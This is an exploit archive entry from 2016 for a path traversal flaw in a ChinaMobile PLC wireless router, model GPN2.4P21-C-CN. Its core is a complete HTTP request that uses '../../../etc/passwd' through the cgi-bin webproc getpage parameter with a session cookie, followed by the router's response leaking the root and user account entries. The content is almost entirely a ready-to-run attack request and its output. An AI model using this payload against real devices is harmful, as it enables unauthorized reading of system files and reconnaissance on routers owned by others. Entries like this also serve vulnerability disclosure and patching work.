PLC Wireless Router GPN2.4P21-C-CN - Arbitrary File Disclosure

2016-08-29T00:00:00
ID 1337DAY-ID-25300
Type zdt
Reporter Rahul Raz
Modified 2016-08-29T00:00:00

Description

Exploit for cgi platform in category web applications

                                        
                                            # Exploit Title: PLC Wireless Router GPN2.4P21-C-CN Authorised Arbitrary File Disclosure
# Date: 28/08/2016
# Exploit Author: Rahul Raz
# Affected Model : GPN2.4P21-C-CN(Frimware- W2001EN-00
#Vendor: ChinaMobile
# Tested on: Ubuntu Linux
_____________________________________________________
 
GET
/cgi-bin/webproc?getpage=../../../etc/passwd&var:language=en_us&var:menu=setup&var:page=connected
Host: 192.168.59.254
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:48.0) Gecko/20100101
Firefox/48.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: sessionid=64857d81
Connection: keep-alive
 
Response
HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Pragma: no-cache
Cache-Control: no-cache
Set-Cookie: sessionid=64857d81; expires=Fri, 31-Dec-9999 23:59:59 GMT;
path=/
 
 
#root:x:0:0:root:/root:/bin/bash
#root:x:0:0:root:/root:/bin/sh
#root:x:0:0:root:/root:/usr/bin/cmd
#tw:x:504:504::/home/tw:/bin/bash
#tw:x:504:504::/home/tw:/bin/msh

#  0day.today [2018-03-19]  #